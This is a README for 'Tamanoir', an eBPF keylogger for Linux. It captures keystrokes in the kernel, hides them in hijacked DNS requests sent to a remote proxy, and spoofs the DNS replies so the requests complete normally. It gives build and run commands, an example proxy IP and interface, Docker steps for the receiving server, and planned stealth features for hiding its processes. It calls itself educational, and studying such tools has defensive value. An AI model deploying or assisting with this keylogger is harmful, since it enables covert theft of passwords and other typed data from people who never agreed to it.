Awesome

💡Overview

1. Capture keystrokes and store them in a queue in the kernel.
2. Intercept DNS requests and inject the captured keystroes in the DNS payload then redirect the request designated remote server acting as a DNS proxy.
3. On the remote server, extract the keys from the DNS payload and send a valid DNS response.
4. Intercept the response and modify its source address so the initial request will complete successfully.

🚀 Setup

You need a Linux based OS.

⚒️ Build from source

To build from source, make sure you have:

• bpf-linker installed.
• Rust installed with nightly toolchain.

1. Build ebpf program

cd tamanoir-ebpf
cargo build --release

2. Build user space program

cargo build --release

This will produce an executable file at target/release/tamanoir that you can copy to a directory in your $PATH

📥 Binary release

You can download the pre-built binaries from the release page

🪄 Usage

Tamanoir

RUST_LOG=info sudo -E tamanoir \
              --proxy-ip <DNS proxy IP> \
              --hijack-ip <locally configured DNS server IP> \
              --layout <keyboard layout> \
              --iface <network interface name>

for example:

RUST_LOG=info sudo -E tamanoir \
              --proxy-ip 192.168.1.75 \
              --hijack-ip 8.8.8.8 \
              --layout 0 \
              --iface wlan0

Currenly, there are two supported keyboard layouts:

0 : qwerty (us)

1 : azerty (fr)

DNS Proxy

On a remote host, make sure you have docker installed.

1. Build proxy image

cd proxy
docker build -t proxy .

2. Run proxy

[!NOTE] Make sure port 53 is available

docker run --rm -it -p 53:53/udp -e PAYLOAD_LEN=8 proxy

🛠️TODO

• Automatic discovery of the configured local dns server
• Automatic discovery of the keyboard layout
• Rewrite the DNS proxy in Rust
• Make Tamanoir stealth (hide used ebpf maps and programs, process pid ...)

⚠️ Disclaimer

Tamanoir is developed for educational purposes only

✍️ Authors

Badr Badri

Adrien Gaultier

⚖️ License

GPLv3